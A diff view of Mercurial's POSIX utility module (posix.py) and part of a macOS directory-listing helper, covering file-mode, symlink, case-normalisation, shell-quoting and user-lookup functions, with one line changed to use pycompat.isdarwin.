73 ret.append((name, tp, stat_res(st_mode=mode, st_mtime=mtime,
73 ret.append((name, tp, stat_res(st_mode=mode, st_mtime=mtime,
74 st_size=cur.datalength)))
74 st_size=cur.datalength)))
75 else:
75 else:
76 ret.append((name, tp))
76 ret.append((name, tp))
77 cur = ffi.cast("val_attrs_t*", int(ffi.cast("intptr_t", cur))
77 cur = ffi.cast("val_attrs_t*", int(ffi.cast("intptr_t", cur))
78 + lgt)
78 + lgt)
79 return ret
79 return ret
80
80
81 def listdir(path, stat=False, skip=None):
81 def listdir(path, stat=False, skip=None):
82 req = ffi.new("struct attrlist*")
82 req = ffi.new("struct attrlist*")
83 req.bitmapcount = lib.ATTR_BIT_MAP_COUNT
83 req.bitmapcount = lib.ATTR_BIT_MAP_COUNT
84 req.commonattr = (lib.ATTR_CMN_RETURNED_ATTRS |
84 req.commonattr = (lib.ATTR_CMN_RETURNED_ATTRS |
85 lib.ATTR_CMN_NAME |
85 lib.ATTR_CMN_NAME |
86 lib.ATTR_CMN_OBJTYPE |
86 lib.ATTR_CMN_OBJTYPE |
87 lib.ATTR_CMN_ACCESSMASK |
87 lib.ATTR_CMN_ACCESSMASK |
88 lib.ATTR_CMN_MODTIME)
88 lib.ATTR_CMN_MODTIME)
89 req.fileattr = lib.ATTR_FILE_DATALENGTH
89 req.fileattr = lib.ATTR_FILE_DATALENGTH
90 dfd = lib.open(path, lib.O_RDONLY, 0)
90 dfd = lib.open(path, lib.O_RDONLY, 0)
91 if dfd == -1:
91 if dfd == -1:
92 raise OSError(ffi.errno, os.strerror(ffi.errno))
92 raise OSError(ffi.errno, os.strerror(ffi.errno))
93
93
94 try:
94 try:
95 ret = listdirinternal(dfd, req, stat, skip)
95 ret = listdirinternal(dfd, req, stat, skip)
96 finally:
96 finally:
97 try:
97 try:
98 lib.close(dfd)
98 lib.close(dfd)
99 except BaseException:
99 except BaseException:
100 pass # we ignore all the errors from closing, not
100 pass # we ignore all the errors from closing, not
101 # much we can do about that
101 # much we can do about that
102 return ret
102 return ret
@@ -1,675 +1,675 b''
1 # posix.py - Posix utility function implementations for Mercurial
1 # posix.py - Posix utility function implementations for Mercurial
2 #
2 #
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import fcntl
11 import fcntl
12 import getpass
12 import getpass
13 import grp
13 import grp
14 import os
14 import os
15 import pwd
15 import pwd
16 import re
16 import re
17 import select
17 import select
18 import stat
18 import stat
19 import sys
19 import sys
20 import tempfile
20 import tempfile
21 import unicodedata
21 import unicodedata
22
22
23 from .i18n import _
23 from .i18n import _
24 from . import (
24 from . import (
25 encoding,
25 encoding,
26 error,
26 error,
27 pycompat,
27 pycompat,
28 )
28 )
29
29
30 posixfile = open
30 posixfile = open
31 normpath = os.path.normpath
31 normpath = os.path.normpath
32 samestat = os.path.samestat
32 samestat = os.path.samestat
33 try:
33 try:
34 oslink = os.link
34 oslink = os.link
35 except AttributeError:
35 except AttributeError:
36 # Some platforms build Python without os.link on systems that are
36 # Some platforms build Python without os.link on systems that are
37 # vaguely unix-like but don't have hardlink support. For those
37 # vaguely unix-like but don't have hardlink support. For those
38 # poor souls, just say we tried and that it failed so we fall back
38 # poor souls, just say we tried and that it failed so we fall back
39 # to copies.
39 # to copies.
40 def oslink(src, dst):
40 def oslink(src, dst):
41 raise OSError(errno.EINVAL,
41 raise OSError(errno.EINVAL,
42 'hardlinks not supported: %s to %s' % (src, dst))
42 'hardlinks not supported: %s to %s' % (src, dst))
43 unlink = os.unlink
43 unlink = os.unlink
44 rename = os.rename
44 rename = os.rename
45 removedirs = os.removedirs
45 removedirs = os.removedirs
46 expandglobs = False
46 expandglobs = False
47
47
48 umask = os.umask(0)
48 umask = os.umask(0)
49 os.umask(umask)
49 os.umask(umask)
50
50
51 def split(p):
51 def split(p):
52 '''Same as posixpath.split, but faster
52 '''Same as posixpath.split, but faster
53
53
54 >>> import posixpath
54 >>> import posixpath
55 >>> for f in [b'/absolute/path/to/file',
55 >>> for f in [b'/absolute/path/to/file',
56 ... b'relative/path/to/file',
56 ... b'relative/path/to/file',
57 ... b'file_alone',
57 ... b'file_alone',
58 ... b'path/to/directory/',
58 ... b'path/to/directory/',
59 ... b'/multiple/path//separators',
59 ... b'/multiple/path//separators',
60 ... b'/file_at_root',
60 ... b'/file_at_root',
61 ... b'///multiple_leading_separators_at_root',
61 ... b'///multiple_leading_separators_at_root',
62 ... b'']:
62 ... b'']:
63 ... assert split(f) == posixpath.split(f), f
63 ... assert split(f) == posixpath.split(f), f
64 '''
64 '''
65 ht = p.rsplit('/', 1)
65 ht = p.rsplit('/', 1)
66 if len(ht) == 1:
66 if len(ht) == 1:
67 return '', p
67 return '', p
68 nh = ht[0].rstrip('/')
68 nh = ht[0].rstrip('/')
69 if nh:
69 if nh:
70 return nh, ht[1]
70 return nh, ht[1]
71 return ht[0] + '/', ht[1]
71 return ht[0] + '/', ht[1]
72
72
73 def openhardlinks():
73 def openhardlinks():
74 '''return true if it is safe to hold open file handles to hardlinks'''
74 '''return true if it is safe to hold open file handles to hardlinks'''
75 return True
75 return True
76
76
77 def nlinks(name):
77 def nlinks(name):
78 '''return number of hardlinks for the given file'''
78 '''return number of hardlinks for the given file'''
79 return os.lstat(name).st_nlink
79 return os.lstat(name).st_nlink
80
80
81 def parsepatchoutput(output_line):
81 def parsepatchoutput(output_line):
82 """parses the output produced by patch and returns the filename"""
82 """parses the output produced by patch and returns the filename"""
83 pf = output_line[14:]
83 pf = output_line[14:]
84 if pycompat.sysplatform == 'OpenVMS':
84 if pycompat.sysplatform == 'OpenVMS':
85 if pf[0] == '`':
85 if pf[0] == '`':
86 pf = pf[1:-1] # Remove the quotes
86 pf = pf[1:-1] # Remove the quotes
87 else:
87 else:
88 if pf.startswith("'") and pf.endswith("'") and " " in pf:
88 if pf.startswith("'") and pf.endswith("'") and " " in pf:
89 pf = pf[1:-1] # Remove the quotes
89 pf = pf[1:-1] # Remove the quotes
90 return pf
90 return pf
91
91
92 def sshargs(sshcmd, host, user, port):
92 def sshargs(sshcmd, host, user, port):
93 '''Build argument list for ssh'''
93 '''Build argument list for ssh'''
94 args = user and ("%s@%s" % (user, host)) or host
94 args = user and ("%s@%s" % (user, host)) or host
95 if '-' in args[:1]:
95 if '-' in args[:1]:
96 raise error.Abort(
96 raise error.Abort(
97 _('illegal ssh hostname or username starting with -: %s') % args)
97 _('illegal ssh hostname or username starting with -: %s') % args)
98 args = shellquote(args)
98 args = shellquote(args)
99 if port:
99 if port:
100 args = '-p %s %s' % (shellquote(port), args)
100 args = '-p %s %s' % (shellquote(port), args)
101 return args
101 return args
102
102
103 def isexec(f):
103 def isexec(f):
104 """check whether a file is executable"""
104 """check whether a file is executable"""
105 return (os.lstat(f).st_mode & 0o100 != 0)
105 return (os.lstat(f).st_mode & 0o100 != 0)
106
106
107 def setflags(f, l, x):
107 def setflags(f, l, x):
108 st = os.lstat(f)
108 st = os.lstat(f)
109 s = st.st_mode
109 s = st.st_mode
110 if l:
110 if l:
111 if not stat.S_ISLNK(s):
111 if not stat.S_ISLNK(s):
112 # switch file to link
112 # switch file to link
113 fp = open(f)
113 fp = open(f)
114 data = fp.read()
114 data = fp.read()
115 fp.close()
115 fp.close()
116 unlink(f)
116 unlink(f)
117 try:
117 try:
118 os.symlink(data, f)
118 os.symlink(data, f)
119 except OSError:
119 except OSError:
120 # failed to make a link, rewrite file
120 # failed to make a link, rewrite file
121 fp = open(f, "w")
121 fp = open(f, "w")
122 fp.write(data)
122 fp.write(data)
123 fp.close()
123 fp.close()
124 # no chmod needed at this point
124 # no chmod needed at this point
125 return
125 return
126 if stat.S_ISLNK(s):
126 if stat.S_ISLNK(s):
127 # switch link to file
127 # switch link to file
128 data = os.readlink(f)
128 data = os.readlink(f)
129 unlink(f)
129 unlink(f)
130 fp = open(f, "w")
130 fp = open(f, "w")
131 fp.write(data)
131 fp.write(data)
132 fp.close()
132 fp.close()
133 s = 0o666 & ~umask # avoid restatting for chmod
133 s = 0o666 & ~umask # avoid restatting for chmod
134
134
135 sx = s & 0o100
135 sx = s & 0o100
136 if st.st_nlink > 1 and bool(x) != bool(sx):
136 if st.st_nlink > 1 and bool(x) != bool(sx):
137 # the file is a hardlink, break it
137 # the file is a hardlink, break it
138 with open(f, "rb") as fp:
138 with open(f, "rb") as fp:
139 data = fp.read()
139 data = fp.read()
140 unlink(f)
140 unlink(f)
141 with open(f, "wb") as fp:
141 with open(f, "wb") as fp:
142 fp.write(data)
142 fp.write(data)
143
143
144 if x and not sx:
144 if x and not sx:
145 # Turn on +x for every +r bit when making a file executable
145 # Turn on +x for every +r bit when making a file executable
146 # and obey umask.
146 # and obey umask.
147 os.chmod(f, s | (s & 0o444) >> 2 & ~umask)
147 os.chmod(f, s | (s & 0o444) >> 2 & ~umask)
148 elif not x and sx:
148 elif not x and sx:
149 # Turn off all +x bits
149 # Turn off all +x bits
150 os.chmod(f, s & 0o666)
150 os.chmod(f, s & 0o666)
151
151
152 def copymode(src, dst, mode=None):
152 def copymode(src, dst, mode=None):
153 '''Copy the file mode from the file at path src to dst.
153 '''Copy the file mode from the file at path src to dst.
154 If src doesn't exist, we're using mode instead. If mode is None, we're
154 If src doesn't exist, we're using mode instead. If mode is None, we're
155 using umask.'''
155 using umask.'''
156 try:
156 try:
157 st_mode = os.lstat(src).st_mode & 0o777
157 st_mode = os.lstat(src).st_mode & 0o777
158 except OSError as inst:
158 except OSError as inst:
159 if inst.errno != errno.ENOENT:
159 if inst.errno != errno.ENOENT:
160 raise
160 raise
161 st_mode = mode
161 st_mode = mode
162 if st_mode is None:
162 if st_mode is None:
163 st_mode = ~umask
163 st_mode = ~umask
164 st_mode &= 0o666
164 st_mode &= 0o666
165 os.chmod(dst, st_mode)
165 os.chmod(dst, st_mode)
166
166
167 def checkexec(path):
167 def checkexec(path):
168 """
168 """
169 Check whether the given path is on a filesystem with UNIX-like exec flags
169 Check whether the given path is on a filesystem with UNIX-like exec flags
170
170
171 Requires a directory (like /foo/.hg)
171 Requires a directory (like /foo/.hg)
172 """
172 """
173
173
174 # VFAT on some Linux versions can flip mode but it doesn't persist
174 # VFAT on some Linux versions can flip mode but it doesn't persist
175 # a FS remount. Frequently we can detect it if files are created
175 # a FS remount. Frequently we can detect it if files are created
176 # with exec bit on.
176 # with exec bit on.
177
177
178 try:
178 try:
179 EXECFLAGS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
179 EXECFLAGS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
180 cachedir = os.path.join(path, '.hg', 'cache')
180 cachedir = os.path.join(path, '.hg', 'cache')
181 if os.path.isdir(cachedir):
181 if os.path.isdir(cachedir):
182 checkisexec = os.path.join(cachedir, 'checkisexec')
182 checkisexec = os.path.join(cachedir, 'checkisexec')
183 checknoexec = os.path.join(cachedir, 'checknoexec')
183 checknoexec = os.path.join(cachedir, 'checknoexec')
184
184
185 try:
185 try:
186 m = os.stat(checkisexec).st_mode
186 m = os.stat(checkisexec).st_mode
187 except OSError as e:
187 except OSError as e:
188 if e.errno != errno.ENOENT:
188 if e.errno != errno.ENOENT:
189 raise
189 raise
190 # checkisexec does not exist - fall through ...
190 # checkisexec does not exist - fall through ...
191 else:
191 else:
192 # checkisexec exists, check if it actually is exec
192 # checkisexec exists, check if it actually is exec
193 if m & EXECFLAGS != 0:
193 if m & EXECFLAGS != 0:
194 # ensure checkisexec exists, check it isn't exec
194 # ensure checkisexec exists, check it isn't exec
195 try:
195 try:
196 m = os.stat(checknoexec).st_mode
196 m = os.stat(checknoexec).st_mode
197 except OSError as e:
197 except OSError as e:
198 if e.errno != errno.ENOENT:
198 if e.errno != errno.ENOENT:
199 raise
199 raise
200 open(checknoexec, 'w').close() # might fail
200 open(checknoexec, 'w').close() # might fail
201 m = os.stat(checknoexec).st_mode
201 m = os.stat(checknoexec).st_mode
202 if m & EXECFLAGS == 0:
202 if m & EXECFLAGS == 0:
203 # check-exec is exec and check-no-exec is not exec
203 # check-exec is exec and check-no-exec is not exec
204 return True
204 return True
205 # checknoexec exists but is exec - delete it
205 # checknoexec exists but is exec - delete it
206 unlink(checknoexec)
206 unlink(checknoexec)
207 # checkisexec exists but is not exec - delete it
207 # checkisexec exists but is not exec - delete it
208 unlink(checkisexec)
208 unlink(checkisexec)
209
209
210 # check using one file, leave it as checkisexec
210 # check using one file, leave it as checkisexec
211 checkdir = cachedir
211 checkdir = cachedir
212 else:
212 else:
213 # check directly in path and don't leave checkisexec behind
213 # check directly in path and don't leave checkisexec behind
214 checkdir = path
214 checkdir = path
215 checkisexec = None
215 checkisexec = None
216 fh, fn = tempfile.mkstemp(dir=checkdir, prefix='hg-checkexec-')
216 fh, fn = tempfile.mkstemp(dir=checkdir, prefix='hg-checkexec-')
217 try:
217 try:
218 os.close(fh)
218 os.close(fh)
219 m = os.stat(fn).st_mode
219 m = os.stat(fn).st_mode
220 if m & EXECFLAGS == 0:
220 if m & EXECFLAGS == 0:
221 os.chmod(fn, m & 0o777 | EXECFLAGS)
221 os.chmod(fn, m & 0o777 | EXECFLAGS)
222 if os.stat(fn).st_mode & EXECFLAGS != 0:
222 if os.stat(fn).st_mode & EXECFLAGS != 0:
223 if checkisexec is not None:
223 if checkisexec is not None:
224 os.rename(fn, checkisexec)
224 os.rename(fn, checkisexec)
225 fn = None
225 fn = None
226 return True
226 return True
227 finally:
227 finally:
228 if fn is not None:
228 if fn is not None:
229 unlink(fn)
229 unlink(fn)
230 except (IOError, OSError):
230 except (IOError, OSError):
231 # we don't care, the user probably won't be able to commit anyway
231 # we don't care, the user probably won't be able to commit anyway
232 return False
232 return False
233
233
234 def checklink(path):
234 def checklink(path):
235 """check whether the given path is on a symlink-capable filesystem"""
235 """check whether the given path is on a symlink-capable filesystem"""
236 # mktemp is not racy because symlink creation will fail if the
236 # mktemp is not racy because symlink creation will fail if the
237 # file already exists
237 # file already exists
238 while True:
238 while True:
239 cachedir = os.path.join(path, '.hg', 'cache')
239 cachedir = os.path.join(path, '.hg', 'cache')
240 checklink = os.path.join(cachedir, 'checklink')
240 checklink = os.path.join(cachedir, 'checklink')
241 # try fast path, read only
241 # try fast path, read only
242 if os.path.islink(checklink):
242 if os.path.islink(checklink):
243 return True
243 return True
244 if os.path.isdir(cachedir):
244 if os.path.isdir(cachedir):
245 checkdir = cachedir
245 checkdir = cachedir
246 else:
246 else:
247 checkdir = path
247 checkdir = path
248 cachedir = None
248 cachedir = None
249 fscheckdir = pycompat.fsdecode(checkdir)
249 fscheckdir = pycompat.fsdecode(checkdir)
250 name = tempfile.mktemp(dir=fscheckdir,
250 name = tempfile.mktemp(dir=fscheckdir,
251 prefix=r'checklink-')
251 prefix=r'checklink-')
252 name = pycompat.fsencode(name)
252 name = pycompat.fsencode(name)
253 try:
253 try:
254 fd = None
254 fd = None
255 if cachedir is None:
255 if cachedir is None:
256 fd = tempfile.NamedTemporaryFile(dir=fscheckdir,
256 fd = tempfile.NamedTemporaryFile(dir=fscheckdir,
257 prefix=r'hg-checklink-')
257 prefix=r'hg-checklink-')
258 target = pycompat.fsencode(os.path.basename(fd.name))
258 target = pycompat.fsencode(os.path.basename(fd.name))
259 else:
259 else:
260 # create a fixed file to link to; doesn't matter if it
260 # create a fixed file to link to; doesn't matter if it
261 # already exists.
261 # already exists.
262 target = 'checklink-target'
262 target = 'checklink-target'
263 try:
263 try:
264 open(os.path.join(cachedir, target), 'w').close()
264 open(os.path.join(cachedir, target), 'w').close()
265 except IOError as inst:
265 except IOError as inst:
266 if inst[0] == errno.EACCES:
266 if inst[0] == errno.EACCES:
267 # If we can't write to cachedir, just pretend
267 # If we can't write to cachedir, just pretend
268 # that the fs is readonly and by association
268 # that the fs is readonly and by association
269 # that the fs won't support symlinks. This
269 # that the fs won't support symlinks. This
270 # seems like the least dangerous way to avoid
270 # seems like the least dangerous way to avoid
271 # data loss.
271 # data loss.
272 return False
272 return False
273 raise
273 raise
274 try:
274 try:
275 os.symlink(target, name)
275 os.symlink(target, name)
276 if cachedir is None:
276 if cachedir is None:
277 unlink(name)
277 unlink(name)
278 else:
278 else:
279 try:
279 try:
280 os.rename(name, checklink)
280 os.rename(name, checklink)
281 except OSError:
281 except OSError:
282 unlink(name)
282 unlink(name)
283 return True
283 return True
284 except OSError as inst:
284 except OSError as inst:
285 # link creation might race, try again
285 # link creation might race, try again
286 if inst[0] == errno.EEXIST:
286 if inst[0] == errno.EEXIST:
287 continue
287 continue
288 raise
288 raise
289 finally:
289 finally:
290 if fd is not None:
290 if fd is not None:
291 fd.close()
291 fd.close()
292 except AttributeError:
292 except AttributeError:
293 return False
293 return False
294 except OSError as inst:
294 except OSError as inst:
295 # sshfs might report failure while successfully creating the link
295 # sshfs might report failure while successfully creating the link
296 if inst[0] == errno.EIO and os.path.exists(name):
296 if inst[0] == errno.EIO and os.path.exists(name):
297 unlink(name)
297 unlink(name)
298 return False
298 return False
299
299
300 def checkosfilename(path):
300 def checkosfilename(path):
301 '''Check that the base-relative path is a valid filename on this platform.
301 '''Check that the base-relative path is a valid filename on this platform.
302 Returns None if the path is ok, or a UI string describing the problem.'''
302 Returns None if the path is ok, or a UI string describing the problem.'''
303 return None # on posix platforms, every path is ok
303 return None # on posix platforms, every path is ok
304
304
305 def setbinary(fd):
305 def setbinary(fd):
306 pass
306 pass
307
307
308 def pconvert(path):
308 def pconvert(path):
309 return path
309 return path
310
310
311 def localpath(path):
311 def localpath(path):
312 return path
312 return path
313
313
314 def samefile(fpath1, fpath2):
314 def samefile(fpath1, fpath2):
315 """Returns whether path1 and path2 refer to the same file. This is only
315 """Returns whether path1 and path2 refer to the same file. This is only
316 guaranteed to work for files, not directories."""
316 guaranteed to work for files, not directories."""
317 return os.path.samefile(fpath1, fpath2)
317 return os.path.samefile(fpath1, fpath2)
318
318
319 def samedevice(fpath1, fpath2):
319 def samedevice(fpath1, fpath2):
320 """Returns whether fpath1 and fpath2 are on the same device. This is only
320 """Returns whether fpath1 and fpath2 are on the same device. This is only
321 guaranteed to work for files, not directories."""
321 guaranteed to work for files, not directories."""
322 st1 = os.lstat(fpath1)
322 st1 = os.lstat(fpath1)
323 st2 = os.lstat(fpath2)
323 st2 = os.lstat(fpath2)
324 return st1.st_dev == st2.st_dev
324 return st1.st_dev == st2.st_dev
325
325
326 # os.path.normcase is a no-op, which doesn't help us on non-native filesystems
326 # os.path.normcase is a no-op, which doesn't help us on non-native filesystems
327 def normcase(path):
327 def normcase(path):
328 return path.lower()
328 return path.lower()
329
329
330 # what normcase does to ASCII strings
330 # what normcase does to ASCII strings
331 normcasespec = encoding.normcasespecs.lower
331 normcasespec = encoding.normcasespecs.lower
332 # fallback normcase function for non-ASCII strings
332 # fallback normcase function for non-ASCII strings
333 normcasefallback = normcase
333 normcasefallback = normcase
334
334
335 if pycompat.sysplatform == 'darwin':
335 if pycompat.isdarwin:
336
336
337 def normcase(path):
337 def normcase(path):
338 '''
338 '''
339 Normalize a filename for OS X-compatible comparison:
339 Normalize a filename for OS X-compatible comparison:
340 - escape-encode invalid characters
340 - escape-encode invalid characters
341 - decompose to NFD
341 - decompose to NFD
342 - lowercase
342 - lowercase
343 - omit ignored characters [200c-200f, 202a-202e, 206a-206f,feff]
343 - omit ignored characters [200c-200f, 202a-202e, 206a-206f,feff]
344
344
345 >>> normcase(b'UPPER')
345 >>> normcase(b'UPPER')
346 'upper'
346 'upper'
347 >>> normcase(b'Caf\\xc3\\xa9')
347 >>> normcase(b'Caf\\xc3\\xa9')
348 'cafe\\xcc\\x81'
348 'cafe\\xcc\\x81'
349 >>> normcase(b'\\xc3\\x89')
349 >>> normcase(b'\\xc3\\x89')
350 'e\\xcc\\x81'
350 'e\\xcc\\x81'
351 >>> normcase(b'\\xb8\\xca\\xc3\\xca\\xbe\\xc8.JPG') # issue3918
351 >>> normcase(b'\\xb8\\xca\\xc3\\xca\\xbe\\xc8.JPG') # issue3918
352 '%b8%ca%c3\\xca\\xbe%c8.jpg'
352 '%b8%ca%c3\\xca\\xbe%c8.jpg'
353 '''
353 '''
354
354
355 try:
355 try:
356 return encoding.asciilower(path) # exception for non-ASCII
356 return encoding.asciilower(path) # exception for non-ASCII
357 except UnicodeDecodeError:
357 except UnicodeDecodeError:
358 return normcasefallback(path)
358 return normcasefallback(path)
359
359
360 normcasespec = encoding.normcasespecs.lower
360 normcasespec = encoding.normcasespecs.lower
361
361
362 def normcasefallback(path):
362 def normcasefallback(path):
363 try:
363 try:
364 u = path.decode('utf-8')
364 u = path.decode('utf-8')
365 except UnicodeDecodeError:
365 except UnicodeDecodeError:
366 # OS X percent-encodes any bytes that aren't valid utf-8
366 # OS X percent-encodes any bytes that aren't valid utf-8
367 s = ''
367 s = ''
368 pos = 0
368 pos = 0
369 l = len(path)
369 l = len(path)
370 while pos < l:
370 while pos < l:
371 try:
371 try:
372 c = encoding.getutf8char(path, pos)
372 c = encoding.getutf8char(path, pos)
373 pos += len(c)
373 pos += len(c)
374 except ValueError:
374 except ValueError:
375 c = '%%%02X' % ord(path[pos:pos + 1])
375 c = '%%%02X' % ord(path[pos:pos + 1])
376 pos += 1
376 pos += 1
377 s += c
377 s += c
378
378
379 u = s.decode('utf-8')
379 u = s.decode('utf-8')
380
380
381 # Decompose then lowercase (HFS+ technote specifies lower)
381 # Decompose then lowercase (HFS+ technote specifies lower)
382 enc = unicodedata.normalize(r'NFD', u).lower().encode('utf-8')
382 enc = unicodedata.normalize(r'NFD', u).lower().encode('utf-8')
383 # drop HFS+ ignored characters
383 # drop HFS+ ignored characters
384 return encoding.hfsignoreclean(enc)
384 return encoding.hfsignoreclean(enc)
385
385
386 if pycompat.sysplatform == 'cygwin':
386 if pycompat.sysplatform == 'cygwin':
387 # workaround for cygwin, in which mount point part of path is
387 # workaround for cygwin, in which mount point part of path is
388 # treated as case sensitive, even though underlying NTFS is case
388 # treated as case sensitive, even though underlying NTFS is case
389 # insensitive.
389 # insensitive.
390
390
391 # default mount points
391 # default mount points
392 cygwinmountpoints = sorted([
392 cygwinmountpoints = sorted([
393 "/usr/bin",
393 "/usr/bin",
394 "/usr/lib",
394 "/usr/lib",
395 "/cygdrive",
395 "/cygdrive",
396 ], reverse=True)
396 ], reverse=True)
397
397
398 # use upper-ing as normcase as same as NTFS workaround
398 # use upper-ing as normcase as same as NTFS workaround
399 def normcase(path):
399 def normcase(path):
400 pathlen = len(path)
400 pathlen = len(path)
401 if (pathlen == 0) or (path[0] != pycompat.ossep):
401 if (pathlen == 0) or (path[0] != pycompat.ossep):
402 # treat as relative
402 # treat as relative
403 return encoding.upper(path)
403 return encoding.upper(path)
404
404
405 # to preserve case of mountpoint part
405 # to preserve case of mountpoint part
406 for mp in cygwinmountpoints:
406 for mp in cygwinmountpoints:
407 if not path.startswith(mp):
407 if not path.startswith(mp):
408 continue
408 continue
409
409
410 mplen = len(mp)
410 mplen = len(mp)
411 if mplen == pathlen: # mount point itself
411 if mplen == pathlen: # mount point itself
412 return mp
412 return mp
413 if path[mplen] == pycompat.ossep:
413 if path[mplen] == pycompat.ossep:
414 return mp + encoding.upper(path[mplen:])
414 return mp + encoding.upper(path[mplen:])
415
415
416 return encoding.upper(path)
416 return encoding.upper(path)
417
417
418 normcasespec = encoding.normcasespecs.other
418 normcasespec = encoding.normcasespecs.other
419 normcasefallback = normcase
419 normcasefallback = normcase
420
420
421 # Cygwin translates native ACLs to POSIX permissions,
421 # Cygwin translates native ACLs to POSIX permissions,
422 # but these translations are not supported by native
422 # but these translations are not supported by native
423 # tools, so the exec bit tends to be set erroneously.
423 # tools, so the exec bit tends to be set erroneously.
424 # Therefore, disable executable bit access on Cygwin.
424 # Therefore, disable executable bit access on Cygwin.
425 def checkexec(path):
425 def checkexec(path):
426 return False
426 return False
427
427
428 # Similarly, Cygwin's symlink emulation is likely to create
428 # Similarly, Cygwin's symlink emulation is likely to create
429 # problems when Mercurial is used from both Cygwin and native
429 # problems when Mercurial is used from both Cygwin and native
430 # Windows, with other native tools, or on shared volumes
430 # Windows, with other native tools, or on shared volumes
431 def checklink(path):
431 def checklink(path):
432 return False
432 return False
433
433
434 _needsshellquote = None
434 _needsshellquote = None
435 def shellquote(s):
435 def shellquote(s):
436 if pycompat.sysplatform == 'OpenVMS':
436 if pycompat.sysplatform == 'OpenVMS':
437 return '"%s"' % s
437 return '"%s"' % s
438 global _needsshellquote
438 global _needsshellquote
439 if _needsshellquote is None:
439 if _needsshellquote is None:
440 _needsshellquote = re.compile(br'[^a-zA-Z0-9._/+-]').search
440 _needsshellquote = re.compile(br'[^a-zA-Z0-9._/+-]').search
441 if s and not _needsshellquote(s):
441 if s and not _needsshellquote(s):
442 # "s" shouldn't have to be quoted
442 # "s" shouldn't have to be quoted
443 return s
443 return s
444 else:
444 else:
445 return "'%s'" % s.replace("'", "'\\''")
445 return "'%s'" % s.replace("'", "'\\''")
446
446
447 def quotecommand(cmd):
447 def quotecommand(cmd):
448 return cmd
448 return cmd
449
449
450 def popen(command, mode='r'):
450 def popen(command, mode='r'):
451 return os.popen(command, mode)
451 return os.popen(command, mode)
452
452
453 def testpid(pid):
453 def testpid(pid):
454 '''return False if pid dead, True if running or not sure'''
454 '''return False if pid dead, True if running or not sure'''
455 if pycompat.sysplatform == 'OpenVMS':
455 if pycompat.sysplatform == 'OpenVMS':
456 return True
456 return True
457 try:
457 try:
458 os.kill(pid, 0)
458 os.kill(pid, 0)
459 return True
459 return True
460 except OSError as inst:
460 except OSError as inst:
461 return inst.errno != errno.ESRCH
461 return inst.errno != errno.ESRCH
462
462
463 def explainexit(code):
463 def explainexit(code):
464 """return a 2-tuple (desc, code) describing a subprocess status
464 """return a 2-tuple (desc, code) describing a subprocess status
465 (codes from kill are negative - not os.system/wait encoding)"""
465 (codes from kill are negative - not os.system/wait encoding)"""
466 if code >= 0:
466 if code >= 0:
467 return _("exited with status %d") % code, code
467 return _("exited with status %d") % code, code
468 return _("killed by signal %d") % -code, -code
468 return _("killed by signal %d") % -code, -code
469
469
470 def isowner(st):
470 def isowner(st):
471 """Return True if the stat object st is from the current user."""
471 """Return True if the stat object st is from the current user."""
472 return st.st_uid == os.getuid()
472 return st.st_uid == os.getuid()
473
473
474 def findexe(command):
474 def findexe(command):
475 '''Find executable for command searching like which does.
475 '''Find executable for command searching like which does.
476 If command is a basename then PATH is searched for command.
476 If command is a basename then PATH is searched for command.
477 PATH isn't searched if command is an absolute or relative path.
477 PATH isn't searched if command is an absolute or relative path.
478 If command isn't found None is returned.'''
478 If command isn't found None is returned.'''
479 if pycompat.sysplatform == 'OpenVMS':
479 if pycompat.sysplatform == 'OpenVMS':
480 return command
480 return command
481
481
482 def findexisting(executable):
482 def findexisting(executable):
483 'Will return executable if existing file'
483 'Will return executable if existing file'
484 if os.path.isfile(executable) and os.access(executable, os.X_OK):
484 if os.path.isfile(executable) and os.access(executable, os.X_OK):
485 return executable
485 return executable
486 return None
486 return None
487
487
488 if pycompat.ossep in command:
488 if pycompat.ossep in command:
489 return findexisting(command)
489 return findexisting(command)
490
490
491 if pycompat.sysplatform == 'plan9':
491 if pycompat.sysplatform == 'plan9':
492 return findexisting(os.path.join('/bin', command))
492 return findexisting(os.path.join('/bin', command))
493
493
494 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
494 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
495 executable = findexisting(os.path.join(path, command))
495 executable = findexisting(os.path.join(path, command))
496 if executable is not None:
496 if executable is not None:
497 return executable
497 return executable
498 return None
498 return None
499
499
500 def setsignalhandler():
500 def setsignalhandler():
501 pass
501 pass
502
502
503 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
503 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
504
504
505 def statfiles(files):
505 def statfiles(files):
506 '''Stat each file in files. Yield each stat, or None if a file does not
506 '''Stat each file in files. Yield each stat, or None if a file does not
507 exist or has a type we don't care about.'''
507 exist or has a type we don't care about.'''
508 lstat = os.lstat
508 lstat = os.lstat
509 getkind = stat.S_IFMT
509 getkind = stat.S_IFMT
510 for nf in files:
510 for nf in files:
511 try:
511 try:
512 st = lstat(nf)
512 st = lstat(nf)
513 if getkind(st.st_mode) not in _wantedkinds:
513 if getkind(st.st_mode) not in _wantedkinds:
514 st = None
514 st = None
515 except OSError as err:
515 except OSError as err:
516 if err.errno not in (errno.ENOENT, errno.ENOTDIR):
516 if err.errno not in (errno.ENOENT, errno.ENOTDIR):
517 raise
517 raise
518 st = None
518 st = None
519 yield st
519 yield st
520
520
521 def getuser():
521 def getuser():
522 '''return name of current user'''
522 '''return name of current user'''
523 return pycompat.fsencode(getpass.getuser())
523 return pycompat.fsencode(getpass.getuser())
524
524
525 def username(uid=None):
525 def username(uid=None):
526 """Return the name of the user with the given uid.
526 """Return the name of the user with the given uid.
527
527
528 If uid is None, return the name of the current user."""
528 If uid is None, return the name of the current user."""
529
529
530 if uid is None:
530 if uid is None:
531 uid = os.getuid()
531 uid = os.getuid()
532 try:
532 try:
533 return pwd.getpwuid(uid)[0]
533 return pwd.getpwuid(uid)[0]
534 except KeyError:
534 except KeyError:
535 return str(uid)
535 return str(uid)
536
536
537 def groupname(gid=None):
537 def groupname(gid=None):
538 """Return the name of the group with the given gid.
538 """Return the name of the group with the given gid.
539
539
540 If gid is None, return the name of the current group."""
540 If gid is None, return the name of the current group."""
541
541
